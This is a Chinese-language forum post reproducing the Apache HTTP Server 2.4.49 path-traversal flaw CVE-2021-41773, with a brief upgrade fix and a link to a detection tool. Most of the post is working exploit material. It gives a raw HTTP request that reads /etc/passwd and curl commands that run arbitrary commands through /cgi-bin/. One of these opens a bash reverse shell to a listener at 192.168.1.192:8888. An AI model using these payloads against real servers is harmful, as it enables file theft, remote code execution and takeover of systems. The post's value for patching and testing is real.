安全矩阵

 找回密码
 立即注册
搜索
查看: 2220|回复: 0

Apache CVE-2021-41773 复现

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-17 20:56:55 | 显示全部楼层 |阅读模式
Apache CVE-2021-41773 复现
漏洞影响版本2.4.49


poc:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cdd3418a72f6-gzip"
If-Modified-Since: Fri, 08 Oct 2021 08:35:04 GMT
Connection: close
用如下 CURL 命令来发送 Payload(其中/icons/必须是一个存在且可访问的目录)


服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令:
curl -v --data "echo;id" 'http://192.168.1.192:17273/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
或者是
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/192.168.1.192/8888 0>&1' "http://192.168.1.192:17273/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"


修复方法
升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版
github上已经有这个漏洞的检测工具https://github.com/inbug-team/CVE-2021-41773


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:34 , Processed in 0.012060 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表